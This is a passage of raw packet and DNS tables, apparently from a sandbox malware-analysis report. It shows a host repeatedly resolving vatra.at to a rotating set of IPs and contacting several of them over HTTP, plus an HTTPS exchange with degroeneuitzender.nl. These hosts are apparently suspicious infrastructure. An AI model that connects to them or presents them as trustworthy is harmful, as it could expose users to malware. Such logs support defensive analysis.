Jan 3, 2023 09:46:54.831203938 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.831458092 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.831538916 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.831562042 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.831605911 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.831674099 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.831688881 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.831899881 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.831974030 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.831993103 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.832216978 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.832293987 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.832313061 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.832509995 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.832591057 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.832613945 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.832791090 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.832882881 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.832901955 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.833074093 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.833142042 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.833168983 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.833215952 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.833290100 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.833307981 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.833463907 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.833534956 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.833555937 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.833677053 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.833754063 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.833772898 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.833925962 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.833993912 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.834008932 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.834068060 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.834137917 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.834156990 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.834367037 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.834449053 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.834462881 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.834599018 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.834665060 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.834681034 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.835515976 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.835621119 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.835649014 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.835666895 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.835726976 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.835751057 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.835794926 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.835803986 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.835817099 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.835856915 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.835901022 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.835912943 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.835927010 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.835985899 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.835999012 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.836042881 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.836111069 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.836126089 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.836174011 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.836236000 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.836251974 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.836355925 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.836424112 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.836438894 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.836498976 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.836566925 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.836580992 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.836646080 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.836710930 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.836726904 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.836772919 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.836838007 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.836850882 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.836894989 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.836987972 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.837002993 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.837017059 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.837061882 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.837155104 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.837230921 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.837245941 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.837280035 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.837332010 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.837347984 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.837390900 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.837392092 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.837433100 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.837606907 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.837745905 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.842129946 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.842168093 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:54.842190981 CET	49714	443	192.168.2.5	5.135.247.111
Jan 3, 2023 09:46:54.842204094 CET	443	49714	5.135.247.111	192.168.2.5
Jan 3, 2023 09:46:55.777519941 CET	49715	80	192.168.2.5	93.112.238.85
Jan 3, 2023 09:46:55.876894951 CET	80	49715	93.112.238.85	192.168.2.5
Jan 3, 2023 09:46:55.877068996 CET	49715	80	192.168.2.5	93.112.238.85
Jan 3, 2023 09:46:55.877154112 CET	49715	80	192.168.2.5	93.112.238.85
Jan 3, 2023 09:46:55.879159927 CET	49715	80	192.168.2.5	93.112.238.85
Jan 3, 2023 09:46:55.977600098 CET	80	49715	93.112.238.85	192.168.2.5
Jan 3, 2023 09:46:56.320611954 CET	80	49715	93.112.238.85	192.168.2.5
Jan 3, 2023 09:46:56.320753098 CET	49715	80	192.168.2.5	93.112.238.85
Jan 3, 2023 09:46:56.325067043 CET	80	49715	93.112.238.85	192.168.2.5
Jan 3, 2023 09:46:56.325304985 CET	49715	80	192.168.2.5	93.112.238.85
Jan 3, 2023 09:46:56.347650051 CET	49716	80	192.168.2.5	195.158.3.162
Jan 3, 2023 09:46:56.419013977 CET	80	49715	93.112.238.85	192.168.2.5
Jan 3, 2023 09:46:56.466700077 CET	80	49716	195.158.3.162	192.168.2.5
Jan 3, 2023 09:46:56.466835022 CET	49716	80	192.168.2.5	195.158.3.162
Jan 3, 2023 09:46:56.466929913 CET	49716	80	192.168.2.5	195.158.3.162
Jan 3, 2023 09:46:56.467057943 CET	49716	80	192.168.2.5	195.158.3.162
Jan 3, 2023 09:46:56.586312056 CET	80	49716	195.158.3.162	192.168.2.5
Jan 3, 2023 09:46:57.028589010 CET	80	49716	195.158.3.162	192.168.2.5
Jan 3, 2023 09:46:57.028631926 CET	80	49716	195.158.3.162	192.168.2.5
Jan 3, 2023 09:46:57.028779030 CET	49716	80	192.168.2.5	195.158.3.162
Jan 3, 2023 09:46:57.028848886 CET	49716	80	192.168.2.5	195.158.3.162
Jan 3, 2023 09:46:57.067939997 CET	49717	80	192.168.2.5	58.235.189.192
Jan 3, 2023 09:46:57.150620937 CET	80	49716	195.158.3.162	192.168.2.5
Jan 3, 2023 09:46:57.365164995 CET	80	49717	58.235.189.192	192.168.2.5
Jan 3, 2023 09:46:57.365362883 CET	49717	80	192.168.2.5	58.235.189.192
Jan 3, 2023 09:46:57.365504026 CET	49717	80	192.168.2.5	58.235.189.192
Jan 3, 2023 09:46:57.365545034 CET	49717	80	192.168.2.5	58.235.189.192
Jan 3, 2023 09:46:57.662678003 CET	80	49717	58.235.189.192	192.168.2.5
Jan 3, 2023 09:46:58.582076073 CET	80	49717	58.235.189.192	192.168.2.5
Jan 3, 2023 09:46:58.582120895 CET	80	49717	58.235.189.192	192.168.2.5
Jan 3, 2023 09:46:58.582231045 CET	49717	80	192.168.2.5	58.235.189.192
Jan 3, 2023 09:46:58.582308054 CET	49717	80	192.168.2.5	58.235.189.192
Jan 3, 2023 09:46:58.624758959 CET	49719	80	192.168.2.5	175.120.254.9
Jan 3, 2023 09:46:58.879075050 CET	80	49717	58.235.189.192	192.168.2.5
Jan 3, 2023 09:46:58.921979904 CET	80	49719	175.120.254.9	192.168.2.5
Jan 3, 2023 09:46:58.922091961 CET	49719	80	192.168.2.5	175.120.254.9
Jan 3, 2023 09:46:58.922198057 CET	49719	80	192.168.2.5	175.120.254.9
Jan 3, 2023 09:46:58.922215939 CET	49719	80	192.168.2.5	175.120.254.9
Jan 3, 2023 09:46:59.219084978 CET	80	49719	175.120.254.9	192.168.2.5
Jan 3, 2023 09:46:59.847616911 CET	80	49719	175.120.254.9	192.168.2.5
Jan 3, 2023 09:46:59.847649097 CET	80	49719	175.120.254.9	192.168.2.5
Jan 3, 2023 09:46:59.847768068 CET	49719	80	192.168.2.5	175.120.254.9
Jan 3, 2023 09:46:59.847851992 CET	49719	80	192.168.2.5	175.120.254.9
Jan 3, 2023 09:47:00.089468956 CET	49720	80	192.168.2.5	211.171.233.126
Jan 3, 2023 09:47:00.144685030 CET	80	49719	175.120.254.9	192.168.2.5
Jan 3, 2023 09:47:00.357709885 CET	80	49720	211.171.233.126	192.168.2.5
Jan 3, 2023 09:47:00.357834101 CET	49720	80	192.168.2.5	211.171.233.126
Jan 3, 2023 09:47:00.357947111 CET	49720	80	192.168.2.5	211.171.233.126
Jan 3, 2023 09:47:00.357969046 CET	49720	80	192.168.2.5	211.171.233.126
Jan 3, 2023 09:47:00.626065969 CET	80	49720	211.171.233.126	192.168.2.5
Jan 3, 2023 09:47:01.673994064 CET	80	49720	211.171.233.126	192.168.2.5
Jan 3, 2023 09:47:01.674078941 CET	80	49720	211.171.233.126	192.168.2.5
Jan 3, 2023 09:47:01.674145937 CET	49720	80	192.168.2.5	211.171.233.126
Jan 3, 2023 09:47:01.674145937 CET	49720	80	192.168.2.5	211.171.233.126
Jan 3, 2023 09:47:02.201354027 CET	49721	80	192.168.2.5	190.140.74.43
Jan 3, 2023 09:47:02.380955935 CET	49720	80	192.168.2.5	211.171.233.126
Jan 3, 2023 09:47:02.399271011 CET	80	49721	190.140.74.43	192.168.2.5
Jan 3, 2023 09:47:02.399425030 CET	49721	80	192.168.2.5	190.140.74.43
Jan 3, 2023 09:47:02.399616003 CET	49721	80	192.168.2.5	190.140.74.43
Jan 3, 2023 09:47:02.402019024 CET	49721	80	192.168.2.5	190.140.74.43
Jan 3, 2023 09:47:02.603060961 CET	80	49721	190.140.74.43	192.168.2.5
Jan 3, 2023 09:47:02.648997068 CET	80	49720	211.171.233.126	192.168.2.5
Jan 3, 2023 09:47:03.289249897 CET	80	49721	190.140.74.43	192.168.2.5
Jan 3, 2023 09:47:03.289397001 CET	49721	80	192.168.2.5	190.140.74.43
Jan 3, 2023 09:47:03.294987917 CET	80	49721	190.140.74.43	192.168.2.5
Jan 3, 2023 09:47:03.296278954 CET	49721	80	192.168.2.5	190.140.74.43
Jan 3, 2023 09:47:03.333415031 CET	49722	80	192.168.2.5	190.140.74.43
Jan 3, 2023 09:47:03.485085011 CET	80	49721	190.140.74.43	192.168.2.5
Jan 3, 2023 09:47:03.538317919 CET	80	49722	190.140.74.43	192.168.2.5
Jan 3, 2023 09:47:03.538463116 CET	49722	80	192.168.2.5	190.140.74.43
Jan 3, 2023 09:47:03.538563967 CET	49722	80	192.168.2.5	190.140.74.43
Jan 3, 2023 09:47:03.538582087 CET	49722	80	192.168.2.5	190.140.74.43
Jan 3, 2023 09:47:03.748282909 CET	80	49722	190.140.74.43	192.168.2.5
Jan 3, 2023 09:47:04.442612886 CET	80	49722	190.140.74.43	192.168.2.5
Jan 3, 2023 09:47:04.442647934 CET	80	49722	190.140.74.43	192.168.2.5
Jan 3, 2023 09:47:04.442714930 CET	49722	80	192.168.2.5	190.140.74.43
Jan 3, 2023 09:47:04.443233013 CET	49722	80	192.168.2.5	190.140.74.43
Jan 3, 2023 09:47:04.644234896 CET	80	49722	190.140.74.43	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2023 09:46:26.467391014 CET	51484	53	192.168.2.5	8.8.8.8
Jan 3, 2023 09:46:26.947051048 CET	53	51484	8.8.8.8	192.168.2.5
Jan 3, 2023 09:46:27.830970049 CET	63446	53	192.168.2.5	8.8.8.8
Jan 3, 2023 09:46:28.340996981 CET	53	63446	8.8.8.8	192.168.2.5
Jan 3, 2023 09:46:30.075356007 CET	56751	53	192.168.2.5	8.8.8.8
Jan 3, 2023 09:46:30.093204021 CET	53	56751	8.8.8.8	192.168.2.5
Jan 3, 2023 09:46:52.890737057 CET	60975	53	192.168.2.5	8.8.8.8
Jan 3, 2023 09:46:52.910130978 CET	53	60975	8.8.8.8	192.168.2.5
Jan 3, 2023 09:46:54.501797915 CET	59220	53	192.168.2.5	8.8.8.8
Jan 3, 2023 09:46:54.537024021 CET	53	59220	8.8.8.8	192.168.2.5
Jan 3, 2023 09:46:55.513380051 CET	55068	53	192.168.2.5	8.8.8.8
Jan 3, 2023 09:46:55.776840925 CET	53	55068	8.8.8.8	192.168.2.5
Jan 3, 2023 09:46:56.328963995 CET	56682	53	192.168.2.5	8.8.8.8
Jan 3, 2023 09:46:56.346973896 CET	53	56682	8.8.8.8	192.168.2.5
Jan 3, 2023 09:46:57.049041986 CET	58532	53	192.168.2.5	8.8.8.8
Jan 3, 2023 09:46:57.067291975 CET	53	58532	8.8.8.8	192.168.2.5
Jan 3, 2023 09:46:58.603823900 CET	58581	53	192.168.2.5	8.8.8.8
Jan 3, 2023 09:46:58.623935938 CET	53	58581	8.8.8.8	192.168.2.5
Jan 3, 2023 09:46:59.858340025 CET	56263	53	192.168.2.5	8.8.8.8
Jan 3, 2023 09:47:00.088844061 CET	53	56263	8.8.8.8	192.168.2.5
Jan 3, 2023 09:47:01.681643009 CET	65513	53	192.168.2.5	8.8.8.8
Jan 3, 2023 09:47:02.193207979 CET	53	65513	8.8.8.8	192.168.2.5
Jan 3, 2023 09:47:03.313154936 CET	56687	53	192.168.2.5	8.8.8.8
Jan 3, 2023 09:47:03.332684994 CET	53	56687	8.8.8.8	192.168.2.5
Jan 3, 2023 09:47:04.455770969 CET	64419	53	192.168.2.5	8.8.8.8
Jan 3, 2023 09:47:04.931497097 CET	53	64419	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2023 09:46:26.467391014 CET	192.168.2.5	8.8.8.8	0xddd8	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:27.830970049 CET	192.168.2.5	8.8.8.8	0x6fe6	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:30.075356007 CET	192.168.2.5	8.8.8.8	0xb88d	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:52.890737057 CET	192.168.2.5	8.8.8.8	0x6810	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:54.501797915 CET	192.168.2.5	8.8.8.8	0x281e	Standard query (0)	degroeneuitzender.nl	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:55.513380051 CET	192.168.2.5	8.8.8.8	0xe866	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:56.328963995 CET	192.168.2.5	8.8.8.8	0xe62c	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:57.049041986 CET	192.168.2.5	8.8.8.8	0x82bd	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:58.603823900 CET	192.168.2.5	8.8.8.8	0xc830	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:59.858340025 CET	192.168.2.5	8.8.8.8	0x2229	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:01.681643009 CET	192.168.2.5	8.8.8.8	0xf2d3	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:03.313154936 CET	192.168.2.5	8.8.8.8	0x11d3	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:04.455770969 CET	192.168.2.5	8.8.8.8	0x5924	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 3, 2023 09:46:26.947051048 CET	8.8.8.8	192.168.2.5	0xddd8	No error (0)	vatra.at	195.158.3.162	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:26.947051048 CET	8.8.8.8	192.168.2.5	0xddd8	No error (0)	vatra.at	190.140.74.43	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:26.947051048 CET	8.8.8.8	192.168.2.5	0xddd8	No error (0)	vatra.at	175.126.109.15	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:26.947051048 CET	8.8.8.8	192.168.2.5	0xddd8	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:26.947051048 CET	8.8.8.8	192.168.2.5	0xddd8	No error (0)	vatra.at	211.171.233.126	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:26.947051048 CET	8.8.8.8	192.168.2.5	0xddd8	No error (0)	vatra.at	187.212.192.17	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:26.947051048 CET	8.8.8.8	192.168.2.5	0xddd8	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:26.947051048 CET	8.8.8.8	192.168.2.5	0xddd8	No error (0)	vatra.at	175.120.254.9	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:26.947051048 CET	8.8.8.8	192.168.2.5	0xddd8	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:26.947051048 CET	8.8.8.8	192.168.2.5	0xddd8	No error (0)	vatra.at	93.112.238.85	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:28.340996981 CET	8.8.8.8	192.168.2.5	0x6fe6	No error (0)	vatra.at	175.120.254.9	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:28.340996981 CET	8.8.8.8	192.168.2.5	0x6fe6	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:28.340996981 CET	8.8.8.8	192.168.2.5	0x6fe6	No error (0)	vatra.at	93.112.238.85	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:28.340996981 CET	8.8.8.8	192.168.2.5	0x6fe6	No error (0)	vatra.at	195.158.3.162	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:28.340996981 CET	8.8.8.8	192.168.2.5	0x6fe6	No error (0)	vatra.at	190.140.74.43	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:28.340996981 CET	8.8.8.8	192.168.2.5	0x6fe6	No error (0)	vatra.at	175.126.109.15	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:28.340996981 CET	8.8.8.8	192.168.2.5	0x6fe6	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:28.340996981 CET	8.8.8.8	192.168.2.5	0x6fe6	No error (0)	vatra.at	211.171.233.126	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:28.340996981 CET	8.8.8.8	192.168.2.5	0x6fe6	No error (0)	vatra.at	187.212.192.17	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:28.340996981 CET	8.8.8.8	192.168.2.5	0x6fe6	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:30.093204021 CET	8.8.8.8	192.168.2.5	0xb88d	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:30.093204021 CET	8.8.8.8	192.168.2.5	0xb88d	No error (0)	vatra.at	93.112.238.85	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:30.093204021 CET	8.8.8.8	192.168.2.5	0xb88d	No error (0)	vatra.at	195.158.3.162	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:30.093204021 CET	8.8.8.8	192.168.2.5	0xb88d	No error (0)	vatra.at	190.140.74.43	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:30.093204021 CET	8.8.8.8	192.168.2.5	0xb88d	No error (0)	vatra.at	175.126.109.15	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:30.093204021 CET	8.8.8.8	192.168.2.5	0xb88d	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:30.093204021 CET	8.8.8.8	192.168.2.5	0xb88d	No error (0)	vatra.at	211.171.233.126	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:30.093204021 CET	8.8.8.8	192.168.2.5	0xb88d	No error (0)	vatra.at	187.212.192.17	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:30.093204021 CET	8.8.8.8	192.168.2.5	0xb88d	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:30.093204021 CET	8.8.8.8	192.168.2.5	0xb88d	No error (0)	vatra.at	175.120.254.9	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:52.910130978 CET	8.8.8.8	192.168.2.5	0x6810	No error (0)	vatra.at	211.171.233.126	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:52.910130978 CET	8.8.8.8	192.168.2.5	0x6810	No error (0)	vatra.at	187.212.192.17	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:52.910130978 CET	8.8.8.8	192.168.2.5	0x6810	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:52.910130978 CET	8.8.8.8	192.168.2.5	0x6810	No error (0)	vatra.at	175.120.254.9	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:52.910130978 CET	8.8.8.8	192.168.2.5	0x6810	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:52.910130978 CET	8.8.8.8	192.168.2.5	0x6810	No error (0)	vatra.at	93.112.238.85	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:52.910130978 CET	8.8.8.8	192.168.2.5	0x6810	No error (0)	vatra.at	195.158.3.162	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:52.910130978 CET	8.8.8.8	192.168.2.5	0x6810	No error (0)	vatra.at	190.140.74.43	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:52.910130978 CET	8.8.8.8	192.168.2.5	0x6810	No error (0)	vatra.at	175.126.109.15	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:52.910130978 CET	8.8.8.8	192.168.2.5	0x6810	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:54.537024021 CET	8.8.8.8	192.168.2.5	0x281e	No error (0)	degroeneuitzender.nl	5.135.247.111	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:55.776840925 CET	8.8.8.8	192.168.2.5	0xe866	No error (0)	vatra.at	93.112.238.85	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:55.776840925 CET	8.8.8.8	192.168.2.5	0xe866	No error (0)	vatra.at	195.158.3.162	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:55.776840925 CET	8.8.8.8	192.168.2.5	0xe866	No error (0)	vatra.at	190.140.74.43	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:55.776840925 CET	8.8.8.8	192.168.2.5	0xe866	No error (0)	vatra.at	175.126.109.15	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:55.776840925 CET	8.8.8.8	192.168.2.5	0xe866	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:55.776840925 CET	8.8.8.8	192.168.2.5	0xe866	No error (0)	vatra.at	211.171.233.126	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:55.776840925 CET	8.8.8.8	192.168.2.5	0xe866	No error (0)	vatra.at	187.212.192.17	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:55.776840925 CET	8.8.8.8	192.168.2.5	0xe866	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:55.776840925 CET	8.8.8.8	192.168.2.5	0xe866	No error (0)	vatra.at	175.120.254.9	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:55.776840925 CET	8.8.8.8	192.168.2.5	0xe866	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:56.346973896 CET	8.8.8.8	192.168.2.5	0xe62c	No error (0)	vatra.at	195.158.3.162	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:56.346973896 CET	8.8.8.8	192.168.2.5	0xe62c	No error (0)	vatra.at	190.140.74.43	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:56.346973896 CET	8.8.8.8	192.168.2.5	0xe62c	No error (0)	vatra.at	175.126.109.15	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:56.346973896 CET	8.8.8.8	192.168.2.5	0xe62c	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:56.346973896 CET	8.8.8.8	192.168.2.5	0xe62c	No error (0)	vatra.at	211.171.233.126	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:56.346973896 CET	8.8.8.8	192.168.2.5	0xe62c	No error (0)	vatra.at	187.212.192.17	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:56.346973896 CET	8.8.8.8	192.168.2.5	0xe62c	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:56.346973896 CET	8.8.8.8	192.168.2.5	0xe62c	No error (0)	vatra.at	175.120.254.9	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:56.346973896 CET	8.8.8.8	192.168.2.5	0xe62c	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
